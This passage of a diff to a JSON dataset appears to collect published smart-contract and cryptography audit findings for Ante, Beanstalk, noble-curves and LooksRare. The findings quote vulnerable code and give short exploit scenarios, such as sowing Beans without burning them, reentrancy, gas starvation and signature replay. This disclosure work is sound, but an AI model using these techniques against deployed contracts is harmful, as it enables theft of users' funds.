- "body": "Once challengers have staked ether and the challenger delay has passed, they can submit transactions to predict that a test will fail and to earn a bonus if it does. An attacker could manipulate the result of an AnteTest by providing a limited amount of gas to the checkTest function, forcing the test to fail. This is because the anteTest.checkTestPasses function receives 63/64 of the gas provided to checkTest (per the 63/64 gas forwarding rule), which may not be enough. This issue stems from the use of a try-catch statement in the _checkTestNoRevert function, which causes the function to return false when an EVM exception occurs, indicating a test failure. We set the difficulty of this finding to high, as the outer call will also revert with an out-of-gas exception if it requires more than 1/64 of the gas; however, other factors (e.g., the block gas limit) may change in the future, allowing for a successful exploitation.
if (!_checkTestNoRevert()) {
    updateDecay();
    verifier = msg.sender;
    failedBlock = block.number;
    pendingFailure = true;
    _calculateChallengerEligibility();
    _bounty = getVerifierBounty();
    uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount);
    _remainingStake = totalStake.sub(_bounty);

Figure 3.1: Part of the checkTest function

/// @return passes bool if the Ante Test passed
function _checkTestNoRevert() internal returns (bool) {
    try anteTest.checkTestPasses() returns (bool passes) {
        return passes;
    } catch {
        return false;
    }
}

Figure 3.2: contracts/AntePool.sol#L567-L573

Exploit Scenario
An attacker calculates the amount of gas required for checkTest to run out of gas in the inner call to anteTest.checkTestPasses. The test fails, and the attacker claims the verifier bonus.

Recommendations
Short term, ensure that the AntePool reverts if the underlying AnteTest does not have enough gas to return a meaningful value. Long term, redesign the test verification mechanism such that gas usage does not cause false positives.",
+ "title": "7. Lack of support for external transfers of nonstandard ERC20 tokens ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "For external transfers of nonstandard ERC20 tokens via the TokenFacet contract, the code uses the standard transferFrom operation from the given token contract without checking the operation's return data; as a result, successfully executed transactions that fail to transfer tokens will go unnoticed, causing confusion in users who believe their funds were successfully transferred. The TokenFacet contract exposes transferToken(), an external function that users can call to transfer ERC20 tokens both to and from the contract and between users.

function transferToken(
    IERC20 token,
    address recipient,
    uint256 amount,
    LibTransfer.From fromMode,
    LibTransfer.To toMode
) external payable {
    LibTransfer.transferToken(token, recipient, amount, fromMode, toMode);
}

Figure 7.1: The transferToken() function in TokenFacet.sol#L39-47

This function calls the LibTransfer library, which handles the token transfer.

function transferToken(
    IERC20 token,
    address recipient,
    uint256 amount,
    From fromMode,
    To toMode
) internal returns (uint256 transferredAmount) {
    if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {
        token.transferFrom(msg.sender, recipient, amount);
        return amount;
    }
    amount = receiveToken(token, amount, msg.sender, fromMode);
    sendToken(token, amount, recipient, toMode);
    return amount;
}

Figure 7.2: The transferToken() function in LibTransfer.sol#L29-43

The LibTransfer library uses the fromMode and toMode values to determine a transfer's sender and receiver, respectively; in most cases, it uses the safeERC20 library to execute transfers. However, if fromMode and toMode are both marked as EXTERNAL, then the transferFrom function of the token contract will be called directly, and safeERC20 will not be used. Essentially, if a user tries to transfer a nonstandard ERC20 token that does not revert on failure and instead indicates a transaction's success or failure in its return data, the user could be led to believe that failed token transfers were successful (a sketch of the safe variant follows below).
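A minimal sketch of the short-term recommendation given below, assuming OpenZeppelin's SafeERC20 library; only the EXTERNAL-to-EXTERNAL branch changes relative to figure 7.2:

using SafeERC20 for IERC20;

if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {
    // safeTransferFrom reverts if the token returns false (or returns no
    // data at all), so a failed transfer of a nonstandard ERC20 can no
    // longer go unnoticed.
    token.safeTransferFrom(msg.sender, recipient, amount);
    return amount;
}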
Exploit Scenario
Alice uses the TokenFacet contract to transfer nonstandard ERC20 tokens that return false on failure to another contract. However, Alice accidentally inputs an amount higher than her balance. The transaction is successfully executed, but because there is no check of the false return value, Alice does not know that her tokens were not transferred.

Recommendations
Short term, use the safeERC20 library for external token transfers. Long term, thoroughly review and document all interactions with arbitrary tokens to prevent similar issues from being introduced in the future.",
 "labels": [
 "Trail of Bits",
 "Severity: Informational",
- "Difficulty: Undetermined"
+ "Difficulty: Low"
 ]
 },
 {
- "title": "5. Reentrancy into AntePool.checkTest scales challenger eligibility amount ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf",
- "body": "A malicious AnteTest or underlying contract being tested can trigger multiple failed checkTest calls by reentering the AntePool.checkTest function. With each call, the _calculateChallengerEligibility method increases the eligibleAmount instead of resetting it, causing the eligibleAmount to scale unexpectedly with each reentrancy.

function checkTest() external override testNotFailed {
    require(challengers.exists(msg.sender), \"ANTE: Only challengers can checkTest\");
    require(
        block.number.sub(eligibilityInfo.lastStakedBlock[msg.sender]) > CHALLENGER_BLOCK_DELAY,
        \"ANTE: must wait 12 blocks after challenging to call checkTest\"
    );
    numTimesVerified = numTimesVerified.add(1);
    lastVerifiedBlock = block.number;
    emit TestChecked(msg.sender);
    if (!_checkTestNoRevert()) {
        updateDecay();
        verifier = msg.sender;
        failedBlock = block.number;
        pendingFailure = true;
        _calculateChallengerEligibility();
        _bounty = getVerifierBounty();
        uint256 totalStake = stakingInfo.totalAmount.add(withdrawInfo.totalAmount);
        _remainingStake = totalStake.sub(_bounty);
        emit FailureOccurred(msg.sender);
    }
}

Figure 5.1: contracts/AntePool.sol#L292-L316

function _calculateChallengerEligibility() internal {
    uint256 cutoffBlock = failedBlock.sub(CHALLENGER_BLOCK_DELAY);
    for (uint256 i = 0; i < challengers.addresses.length; i++) {
        address challenger = challengers.addresses[i];
        if (eligibilityInfo.lastStakedBlock[challenger] < cutoffBlock) {
            eligibilityInfo.eligibleAmount = eligibilityInfo.eligibleAmount.add(
                _storedBalance(challengerInfo.userInfo[challenger], challengerInfo)
            );
        }
    }
}

Figure 5.2: contracts/AntePool.sol#L553-L563

Appendix D includes a proof-of-concept AnteTest contract and hardhat unit test that demonstrate this issue.

Exploit Scenario
An attacker deploys an AnteTest contract or a vulnerable contract to be tested. The attacker directs the deployed contract to call AntePool.stake, which registers the contract as a challenger. The malicious contract then reenters AntePool.checkTest and triggers multiple failures within the same call stack. As a result, the AntePool makes multiple calls to the _calculateChallengerEligibility method, which increases the challenger eligibility amount with each call. This results in a greater-than-expected loss of pool funds.

Recommendations
Short term, implement checks to ensure the AntePool contract's methods cannot be reentered while checkTest is executing. Long term, ensure that all calls to external contracts are reviewed for reentrancy risks. To prevent a reentrancy from causing undefined behavior in the system, ensure state variables are updated in the appropriate order; alternatively (and if sensible), disallow reentrancy altogether.

A. Vulnerability Categories
The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
",
+ "title": "8. Plot transfers from users with allowances revert if the owner has an existing pod listing ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "Whenever a plot transfer is executed by a user with an allowance (i.e., a transfer in which the caller was approved by the plot's owner), the transfer will revert if there is an existing listing for the pods contained in that plot. The MarketplaceFacet contract exposes a function, transferPlot(), that allows the owner of a plot to transfer the pods in that plot to another user; additionally, the owner of a plot can call the approvePods() function (figure 8.1) to approve other users to transfer these pods on the owner's behalf.

function approvePods(address spender, uint256 amount) external payable nonReentrant {
    require(spender != address(0), \"Field: Pod Approve to 0 address.\");
    setAllowancePods(msg.sender, spender, amount);
    emit PodApproval(msg.sender, spender, amount);
}

Figure 8.1: The approvePods() function in MarketplaceFacet.sol#L147-155

Once approved, the given address can call the transferPlot() function to transfer pods on the owner's behalf. The function checks and decreases the allowance and then checks whether there is an existing pod listing for the target pods. If there is an existing listing, the function tries to cancel it by calling the _cancelPodListing() function.

function transferPlot(
    address sender,
    address recipient,
    uint256 id,
    uint256 start,
    uint256 end
) external payable nonReentrant {
    require(
        sender != address(0) && recipient != address(0),
        \"Field: Transfer to/from 0 address.\"
    );
    uint256 amount = s.a[sender].field.plots[id];
    require(amount > 0, \"Field: Plot not owned by user.\");
    require(end > start && amount >= end, \"Field: Pod range invalid.\");
    amount = end - start; // Note: SafeMath is redundant here.
    if (
        msg.sender != sender &&
        allowancePods(sender, msg.sender) != uint256(-1)
    ) {
        decrementAllowancePods(sender, msg.sender, amount);
    }
    if (s.podListings[id] != bytes32(0)) {
        _cancelPodListing(id); // TODO: Look into this cancelling.
    }
    _transferPlot(sender, recipient, id, start, amount);
}

Figure 8.2: The transferPlot() function in MarketplaceFacet.sol#L119-145

The _cancelPodListing() function receives only an id as the input and relies on the msg.sender to determine the listing's owner. However, if the transfer is executed by a user with an allowance, the msg.sender is the user who was granted the allowance, not the owner of the listing. As a result, the function will revert (a sketch of a fix follows below).

function _cancelPodListing(uint256 index) internal {
    require(
        s.a[msg.sender].field.plots[index] > 0,
        \"Marketplace: Listing not owned by sender.\"
    );
    delete s.podListings[index];
    emit PodListingCancelled(msg.sender, index);
}

Figure 8.3: The _cancelPodListing() function in Listing.sol#L149-156
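A minimal sketch of the short-term recommendation given below, assuming the same storage layout as figure 8.3 (the account parameter name is illustrative):

// Sketch only: transferPlot() would pass the plot owner (its `sender`
// argument) here, instead of _cancelPodListing assuming that msg.sender
// owns the listing.
function _cancelPodListing(address account, uint256 index) internal {
    require(
        s.a[account].field.plots[index] > 0,
        \"Marketplace: Listing not owned by user.\"
    );
    delete s.podListings[index];
    emit PodListingCancelled(account, index);
}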
Exploit Scenario
A new smart contract that integrates with the MarketplaceFacet contract is deployed. This contract has features allowing it to manage users' pods on their behalf. Alice approves the contract so that it can manage her pods. Some time passes, and Alice calls one of the smart contract's functions, which requires Alice to transfer ownership of her plot to the contract. Because Alice has already approved the smart contract, it can perform the transfer on her behalf. To do so, it calls the transferPlot() function in the MarketplaceFacet contract; however, this call reverts because Alice has an open listing for the pods that the contract is trying to transfer.

Recommendations
Short term, add a new input to _cancelPodListing() that is equal to msg.sender if the caller is the owner of the listing, but equal to the pod owner if the caller is a user who was approved by the owner. Long term, thoroughly document the expected behavior of the MarketplaceFacet contract and the properties (invariants) it should enforce, such as the property that plot transfers initiated by users with an allowance cancel the owner's listing. Expand the unit test suite to test that these properties hold.",
 "labels": [
 "Trail of Bits",
- "Severity: Informational",
- "Difficulty: Undetermined"
+ "Severity: Low",
+ "Difficulty: Low"
 ]
 },
 {
- "title": "1. Timing issues ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-ryanshea-noblecurveslibrary-securityreview.pdf",
- "body": "The library provides a scalar multiplication routine that aims to keep the number of BigInteger operations constant, in order to be (close to) constant-time. However, there are some locations in the implementation where timing differences can cause issues:

- Pre-computed point look-up during scalar multiplication (figure 1.1)
- Second part of signature generation
- Tonelli-Shanks square root computation

// Check if we're onto Zero point.
// Add random point inside current window to f.
const offset1 = offset;
const offset2 = offset + Math.abs(wbits) - 1; // -1 because we skip zero
const cond1 = window % 2 !== 0;
const cond2 = wbits < 0;
if (wbits === 0) {
    // The most important part for const-time getPublicKey
    f = f.add(constTimeNegate(cond1, precomputes[offset1]));
} else {
    p = p.add(constTimeNegate(cond2, precomputes[offset2]));
}

Figure 1.1: Pre-computed point lookup during scalar multiplication (noble-curves/src/abstract/curve.ts:117-128)

The scalar multiplication routine comprises a loop, part of which is shown in figure 1.1. Each iteration adds a selected pre-computed point to the accumulator p (or to the dummy accumulator f if the relevant scalar bits are all zero). However, the array access to select the appropriate pre-computed point is not constant-time. Figure 1.2 shows how the implementation computes the second half of an ECDSA signature.

const s = modN(ik * modN(m + modN(d * r))); // s = k^-1(m + rd) mod n

Figure 1.2: Generation of the second part of the signature (noble-curves/src/abstract/weierstrass.ts:988)

First, the private key is multiplied by the first half of the signature and reduced modulo the group order. Next, the message digest is added and the result is again reduced modulo the group order. If the modulo operation is not constant-time, and if an attacker can detect this timing difference, they can perform a lattice attack to recover the signing key. The details of this attack are described in the TCHES 2019 article by Ryan. Note that the article does not show that this timing-difference attack can be practically exploited, but instead mounts a cache-timing attack to exploit it. FpSqrt is a function that computes square roots of quadratic residues over F_p. Based on the value of the modulus, this function chooses one of several sub-algorithms, including Tonelli-Shanks. Some of these algorithms are constant-time with respect to the input, but some are not. In particular, the implementation of the Tonelli-Shanks algorithm has a high degree of timing variability.
The FpSqrt function is used to decode compressed point representations, so it can influence timing when handling potentially sensitive or adversarial data. Most texts consider Tonelli-Shanks the fallback algorithm when a faster or simpler algorithm is unavailable. However, Tonelli-Shanks can be used for any prime modulus. Further, Tonelli-Shanks can be made constant-time for a given value of the modulus. Timing leakage threats can be reduced by modifying the Tonelli-Shanks code to run in constant time (see here), and making the constant-time implementation the default square root algorithm. Special-case algorithms can be broken out into separate functions (whether constant- or variable-time), for use when the modulus is known to work, or timing attacks are not a concern.

Exploit Scenario
An attacker interacts with a user of the library and measures the time it takes to execute signature generation or ECDH key exchange. In the case of static ECDH, the attacker may provide different public keys to be multiplied with the static private key of the library user. In the case of ECDSA, the attacker may get the user to repeatedly sign the same message, which results in scalar multiplications on the base point using the same deterministically generated nonce. The attacker can subsequently average the obtained execution times for operations with the same input to gain more precise timing estimates. Then, the attacker uses the obtained execution times to mount a timing attack. In the case of ECDSA, the attacker may attempt to mount the attack from the TCHES 2019 article by Ryan; however, it is unknown whether this attack will work in practice when based purely on timing. In the case of static ECDH, the attacker may attempt to mount a recursive attack, similar to the attacks described in the Cardis 1998 article by Dhem et al. or the JoCE 2013 article by Danger et al. Note that the timing differences caused by the precomputed point look-up may not be sufficient to mount such a timing attack. The attacker would need to find other timing differences, such as differences in the point addition routines based on one of the input points. The fact that the library uses a complete addition formula increases the difficulty, but there could still be timing differences caused by the underlying big integer arithmetic. Determining whether such timing attacks are practically applicable to the library (and how many executions they would need) requires a large number of measurements on a dedicated benchmarking system, which was not done as part of this engagement.

Recommendations
Short term, consider adding scalar randomization to primitives where the same private scalar can be used multiple times, such as ECDH and deterministic ECDSA. To mitigate the attack from the TCHES 2019 article by Ryan, consider either blinding the private scalar in the signature computation or removing the intermediate modular reductions, i.e., computing s = k^-1(m + r*d) mod n with a single final reduction. Long term, ensure that all low-level operations are constant-time.

References
- Return of the Hidden Number Problem, Ryan, TCHES 2019
- A Practical Implementation of the Timing Attack, Dhem et al., Cardis 1998
- A synthesis of side-channel attacks on elliptic curve cryptography in smart-cards, Danger et al., JoCE 2013",
+ "title": "9. Users can sow more Bean tokens than are burned ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "An accounting error allows users to sow more Bean tokens than the available soil allows. Whenever the price of Bean is below its peg, the protocol issues soil. Soil represents the willingness of the protocol to take Bean tokens off the market in exchange for a pod. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as non-callable bonds that mature on a first-in-first-out (FIFO) basis as the protocol issues new Bean tokens. Whenever soil is available, users can call the sow() and sowWithMin() functions in the FieldFacet contract.

function sowWithMin(
    uint256 amount,
    uint256 minAmount,
    LibTransfer.From mode
) public payable returns (uint256) {
    uint256 sowAmount = s.f.soil;
    require(
        sowAmount >= minAmount && amount >= minAmount && minAmount > 0,
        \"Field: Sowing below min or 0 pods.\"
    );
    if (amount < sowAmount) sowAmount = amount;
    return _sow(sowAmount, mode);
}

Figure 9.1: The sowWithMin() function in FieldFacet.sol#L41-53

The sowWithMin() function ensures that there is enough soil to sow the given number of Bean tokens and that the call will not sow fewer tokens than the specified minAmount. Once it makes these checks, it calls the _sow() function.

function _sow(uint256 amount, LibTransfer.From mode) internal returns (uint256 pods) {
    pods = LibDibbler.sow(amount, msg.sender);
    if (mode == LibTransfer.From.EXTERNAL) C.bean().burnFrom(msg.sender, amount);
    else {
        amount = LibTransfer.receiveToken(C.bean(), amount, msg.sender, mode);
        C.bean().burn(amount);
    }
}

Figure 9.2: The _sow() function in FieldFacet.sol#L55-65

The _sow() function first calculates the number of pods that will be sown by calling the sow() function in the LibDibbler library, which performs the internal accounting and calculates the number of pods that the user is entitled to.

function sow(uint256 amount, address account) internal returns (uint256) {
    AppStorage storage s = LibAppStorage.diamondStorage();
    // We can assume amount <= soil from getSowAmount
    s.f.soil = s.f.soil - amount;
    return sowNoSoil(amount, account);
}

function sowNoSoil(uint256 amount, address account) internal returns (uint256) {
    AppStorage storage s = LibAppStorage.diamondStorage();
    uint256 pods = beansToPods(amount, s.w.yield);
    sowPlot(account, amount, pods);
    s.f.pods = s.f.pods.add(pods);
    saveSowTime();
    return pods;
}

function sowPlot(
    address account,
    uint256 beans,
    uint256 pods
) private {
    AppStorage storage s = LibAppStorage.diamondStorage();
    s.a[account].field.plots[s.f.pods] = pods;
    emit Sow(account, s.f.pods, beans, pods);
}

Figure 9.3: The sow(), sowNoSoil(), and sowPlot() functions in LibDibbler.sol#L41-53

Finally, the _sow() function burns the Bean tokens from the caller's account, removing them from the supply. To do so, the function calls burnFrom() if the mode parameter is EXTERNAL (i.e., if the Bean tokens to be burned are not escrowed in the contract) and burn() if the Bean tokens are escrowed. If the mode parameter is not EXTERNAL, the receiveToken() function is executed to update the internal accounting of the contract before burning the tokens. This function returns the number of tokens that were transferred into the contract. In essence, the receiveToken() function allows the contract to correctly account for token transfers into it and to manage internal balances without performing token transfers.
function receiveToken(
    IERC20 token,
    uint256 amount,
    address sender,
    From mode
) internal returns (uint256 receivedAmount) {
    if (amount == 0) return 0;
    if (mode != From.EXTERNAL) {
        receivedAmount = LibBalance.decreaseInternalBalance(
            sender,
            token,
            amount,
            mode != From.INTERNAL
        );
        if (amount == receivedAmount || mode == From.INTERNAL_TOLERANT)
            return receivedAmount;
    }
    token.safeTransferFrom(sender, address(this), amount - receivedAmount);
    return amount;
}

Figure 9.4: The receiveToken() function in FieldFacet.sol#L41-53

However, if the mode parameter is INTERNAL_TOLERANT, the contract allows the user to partially fill amount (i.e., to transfer as much as the user can), which means that if the user does not own the given amount of Bean tokens, the protocol simply burns as many tokens as the user owns but still allows the user to sow the full amount.

Exploit Scenario
Eve, a malicious user, spots the vulnerability in the FieldFacet contract and waits until Bean is below its peg and the protocol starts issuing soil. Bean finally goes below its peg, and the protocol issues 1,000 soil. Eve deposits a single Bean token into the contract by calling the transferToken() function in the TokenFacet contract. She then calls the sow() function with amount equal to 1000 and mode equal to INTERNAL_TOLERANT. The sow() function is executed, sowing 1,000 Bean tokens but burning only a single token.

Recommendations
Short term, modify the relevant code so that users' Bean tokens are burned before the accounting for the soil and pods is updated and so that, if the mode field is not EXTERNAL, the amount returned by receiveToken() is used as the input to LibDibbler.sow() (a sketch follows below). Long term, thoroughly document the expected behavior of the FieldFacet contract and the properties (invariants) it should enforce, such as the property that the sow() function always sows as many Bean tokens as were burned. Expand the unit test suite to test that these properties hold.
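A minimal sketch of the short-term fix, reordering the _sow() logic from figure 9.2 so that the amount actually burned is the amount that gets sown:

function _sow(uint256 amount, LibTransfer.From mode) internal returns (uint256 pods) {
    if (mode == LibTransfer.From.EXTERNAL) {
        C.bean().burnFrom(msg.sender, amount);
    } else {
        // receiveToken() returns the number of tokens actually taken from
        // the user, so an INTERNAL_TOLERANT caller can no longer sow more
        // than they burn.
        amount = LibTransfer.receiveToken(C.bean(), amount, msg.sender, mode);
        C.bean().burn(amount);
    }
    pods = LibDibbler.sow(amount, msg.sender);
}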
",
 "labels": [
 "Trail of Bits",
- "Severity: Informational",
+ "Severity: High",
+ "Difficulty: Low"
 ]
 },
 {
+ "title": "10. Pods may never ripen ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "Whenever the price of Bean is below its peg, the protocol takes Bean tokens off the market in exchange for a number of pods dependent on the current interest rate. Essentially, Bean owners loan their tokens to the protocol and receive pods in exchange. We can think of pods as loans that are repaid on a FIFO basis as the protocol issues new Bean tokens. A group of pods that are created together is called a plot. The queue of plots is referred to as the pod line. The pod line has no practical bound on its length, so during periods of decreasing demand, it can grow indefinitely. No yield is awarded until the given plot owner is first in line and until the price of Bean is above its value peg. While the protocol does not default on its debt, the only way for pods to ripen is if demand increases enough for the price of Bean to be above its value peg for some time. While the price of Bean is above its peg, a portion of newly minted Bean tokens is used to repay the first plot in the pod line until fully repaid, decreasing the length of the pod line. During an extended period of decreasing supply, the pod line could grow long enough that lenders receive an unappealing time-weighted rate of return, even if the yield is increased; a sufficiently long pod line could encourage users, uncertain of whether future demand will grow enough for them to be repaid, to sell their Bean tokens rather than lending them to the protocol. Under such circumstances, the protocol will be unable to disincentivize Bean market sales, disrupting its ability to return Bean to its value peg.

Exploit Scenario
Bean goes through an extended period of increasing demand, overextending its supply. Then, demand for Bean tokens slowly and steadily declines, and the pod line grows in length. At a certain point, some users decide that their time-weighted rate of return is unfavorable or too uncertain despite the promised high yields. Instead of lending their Bean tokens to the protocol, they sell.

Recommendations
Explore options for backing Bean's value with an offer that is guaranteed to eventually be fulfilled.

11. Bean and the offer backing it are strongly correlated
Severity: Undetermined Difficulty: Undetermined
Type: Economic Finding ID: TOB-BEANS-011
Target: The Beanstalk protocol",
 "labels": [
 "Trail of Bits",
 "Severity: Undetermined",
 "Difficulty: Undetermined"
 ]
 },
 {
- "title": "1. Risk of reuse of signatures across forks due to lack of chainID validation ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf",
- "body": "At construction, the LooksRareExchange contract computes the domain separator using the network's chainID, which is fixed at the time of deployment. In the event of a post-deployment chain fork, the chainID cannot be updated, and the signatures may be replayed across both versions of the chain.

constructor(
    address _currencyManager,
    address _executionManager,
    address _royaltyFeeManager,
    address _WETH,
    address _protocolFeeRecipient
) {
    // Calculate the domain separator
    DOMAIN_SEPARATOR = keccak256(
        abi.encode(
            0x8b73c3c69bb8fe3d512ecc4cf759cc79239f7b179b0ffacaa9a75d522b39400f, // keccak256(\"EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)\")
            0xda9101ba92939daf4bb2e18cd5f942363b9297fbc3232c9dd964abb1fb70ed71, // keccak256(\"LooksRareExchange\")
            0xc89efdaa54c0f20c7adf612882df0950f5a951637e0307cdcb4c672f298b8bc6, // keccak256(bytes(\"1\")) for versionId = 1
            block.chainid,
            address(this)
        )
    );
    currencyManager = ICurrencyManager(_currencyManager);
    executionManager = IExecutionManager(_executionManager);
    royaltyFeeManager = IRoyaltyFeeManager(_royaltyFeeManager);
    WETH = _WETH;
    protocolFeeRecipient = _protocolFeeRecipient;

Figure 1.1: contracts/contracts/LooksRareExchange.sol#L137-L145

The _validateOrder function in the LooksRareExchange contract uses a SignatureChecker function, verify, to check the validity of a signature:

// Verify the validity of the signature
require(
    SignatureChecker.verify(
        orderHash,
        makerOrder.signer,
        makerOrder.v,
        makerOrder.r,
        makerOrder.s,
        DOMAIN_SEPARATOR
    ),
    \"Signature: Invalid\"
);

Figure 1.2: contracts/contracts/LooksRareExchange.sol#L576-L587

However, the verify function checks only that a user has signed the domainSeparator. As a result, in the event of a hard fork, an attacker could reuse signatures to receive user funds on both chains. To mitigate this risk, if a change in the chainID is detected, the domain separator can be cached and regenerated (as in the sketch below).
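A minimal sketch of that mitigation, following the pattern used by OpenZeppelin's EIP712 helper (the field names and the _buildDomainSeparator() helper below are illustrative):

// Sketch only: cache the domain separator together with the chain id it was
// built for, and rebuild it whenever block.chainid no longer matches.
bytes32 private immutable _CACHED_DOMAIN_SEPARATOR;
uint256 private immutable _CACHED_CHAIN_ID;

function _domainSeparator() internal view returns (bytes32) {
    if (block.chainid == _CACHED_CHAIN_ID) {
        return _CACHED_DOMAIN_SEPARATOR;
    }
    // hypothetical helper that recomputes the separator with the current chain id
    return _buildDomainSeparator();
}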
Alternatively, instead of regenerating the entire domain separator, the chainID can be included in the schema of the signature passed to the order hash.

/**
 * @notice Returns whether the signer matches the signed message
 * @param hash the hash containing the signed message
 * @param signer the signer address to confirm message validity
 * @param v parameter (27 or 28)
 * @param r parameter
 * @param s parameter
 * @param domainSeparator parameter to prevent signature being executed in other chains and environments
 * @return true --> if valid // false --> if invalid
 */
function verify(
    bytes32 hash,
    address signer,
    uint8 v,
    bytes32 r,
    bytes32 s,
    bytes32 domainSeparator
) internal view returns (bool) {
    // \x19\x01 is the standardized encoding prefix
    // https://eips.ethereum.org/EIPS/eip-712#specification
    bytes32 digest = keccak256(abi.encodePacked(\"\\x19\\x01\", domainSeparator, hash));
    if (Address.isContract(signer)) {
        // 0x1626ba7e is the interfaceId for signature contracts (see IERC1271)
        return IERC1271(signer).isValidSignature(digest, abi.encodePacked(r, s, v)) == 0x1626ba7e;
    } else {
        return recover(digest, v, r, s) == signer;
    }
}

Figure 1.3: contracts/contracts/libraries/SignatureChecker.sol#L41-L68

The signature schema does not account for the contract's chain. If a fork of Ethereum is made after the contract's creation, every signature will be usable in both forks.

Exploit Scenario
Bob signs a maker order on the Ethereum mainnet. He signs the domain separator with a signature to sell an NFT. Later, Ethereum is hard-forked and retains the same chain ID. As a result, there are two parallel chains with the same chain ID, and Eve can use Bob's signature to match orders on the forked chain.

Recommendations
Short term, to prevent post-deployment forks from affecting signatures, add the chain ID opcode to the signature schema. Long term, identify and document the risks associated with having forks of multiple chains and develop related mitigation strategies.",
 "labels": [
 "Trail of Bits",
- "Severity: Low",
- "Difficulty: High"
+ "Severity: Undetermined",
+ "Difficulty: Undetermined"
 ]
 },
 {
+ "title": "12. Ability to whitelist assets uncorrelated with Bean price, misaligning governance incentives ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "Stalk is the governance token of the system, rewarded to users who deposit certain whitelisted assets into the silo, the system's asset storage. When demand for Bean increases, the protocol increases the Bean supply by minting new Bean tokens and allocating some of them to Stalk holders. Additionally, if the price of Bean remains above its peg for an extended period of time, then a season of plenty (SoP) occurs: Bean is minted and sold on the open market in exchange for exogenous assets such as ETH. These exogenous assets are allocated entirely to Stalk holders. When demand for Bean decreases, the protocol decreases the Bean supply by borrowing Bean tokens from Bean owners. If the demand for Bean is persistently low and some of these loans are never repaid, Stalk holders are not directly penalized by the protocol. However, if the only whitelisted assets are strongly correlated with the price of Bean (such as ETH:BEAN LP tokens), then the value of Stalk holders' deposited collateral would decline, indirectly penalizing Stalk holders for an unhealthy system. If, however, exogenous assets without a strong correlation to Bean are whitelisted, then Stalk holders who have deposited such assets will be protected from financial penalties if the price of Bean crashes.
Exploit Scenario
Stalk holders vote to whitelist ETH as a depositable asset. They proceed to deposit ETH and begin receiving shares of rewards, including 3CRV tokens acquired during SoPs. Governance is now incentivized to increase the supply of Bean as high as possible to obtain more 3CRV rewards, which eventually results in an overextension of the Bean supply and a subsequent price crash. After the Bean price crashes, Stalk holders withdraw their deposited ETH and 3CRV rewards. Because ETH is not strongly correlated with the price of Bean, they do not suffer financial loss as a result of the crash. Alternatively, because of the lack of on-chain enforcement of off-chain votes, the above scenario could occur if the community multisignature wallet whitelists ETH, even if no related vote occurred.

Recommendations
Do not allow any assets that are not strongly correlated with the price of Bean to be whitelisted. Additionally, implement monitoring systems that provide alerts every time a new asset is whitelisted.",
 "labels": [
 "Trail of Bits",
- "Severity: Low",
- "Difficulty: Low"
+ "Severity: Undetermined",
+ "Difficulty: Undetermined"
 ]
 },
 {
- "title": "2. Lack of two-step process for contract ownership changes ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/LooksRare.pdf",
- "body": "The owner of a LooksRare protocol contract can be changed by calling the transferOwnership function in OpenZeppelin's Ownable contract. This function internally calls the _transferOwnership function, which immediately sets the contract's new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes.

/**
 * @dev Leaves the contract without owner. It will not be possible to call
 * `onlyOwner` functions anymore. Can only be called by the current owner.
 *
 * NOTE: Renouncing ownership will leave the contract without an owner,
 * thereby removing any functionality that is only available to the owner.
 */
function renounceOwnership() public virtual onlyOwner {
    _transferOwnership(address(0));
}

/**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Can only be called by the current owner.
 */
function transferOwnership(address newOwner) public virtual onlyOwner {
    require(newOwner != address(0), \"Ownable: new owner is the zero address\");
    _transferOwnership(newOwner);
}

/**
 * @dev Transfers ownership of the contract to a new account (`newOwner`).
 * Internal function without access restriction.
 */
function _transferOwnership(address newOwner) internal virtual {
    address oldOwner = _owner;
    _owner = newOwner;
    emit OwnershipTransferred(oldOwner, newOwner);
}

Figure 2.1: OpenZeppelin's Ownable contract

Exploit Scenario
Alice and Bob invoke the transferOwnership() function on the LooksRare multisig wallet to change the address of an existing contract's owner. They accidentally enter the wrong address, and ownership of the contract is transferred to the incorrect address. As a result, access to the contract is permanently revoked.

Recommendations
Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts (appendix E) and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.",
+ "title": "13. Unchecked burnFrom return value ",
+ "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf",
+ "body": "While recapitalizing the Beanstalk protocol, Bean and LP tokens that existed before the 2022 governance hack are represented as unripe tokens. Ripening is the process of burning unripe tokens in exchange for a pro rata share of the underlying assets generated during the Barn Raise. Holders of unripe tokens call the ripen function to receive their portion of the recovered underlying assets. This portion grows while the price of Bean is above its peg, incentivizing users to ripen their tokens later, when more of the loss has been recovered. The ripen code assumes that if users try to redeem more unripe tokens than they hold, burnFrom will revert. If burnFrom returns false instead of reverting, the failure of the balance check will go undetected, and the caller will be able to recover all of the underlying tokens held by the contract. While LibUnripe.decrementUnderlying will revert on calls to ripen more than the contract's balance, it does not check the user's balance. The source code of the unripeToken contract was not provided for review during this audit, so we could not determine whether its burnFrom method is implemented safely.

function ripen(
    address unripeToken,
    uint256 amount,
    LibTransfer.To mode
) external payable nonReentrant returns (uint256 underlyingAmount) {
    underlyingAmount = getPenalizedUnderlying(unripeToken, amount);
    LibUnripe.decrementUnderlying(unripeToken, underlyingAmount);
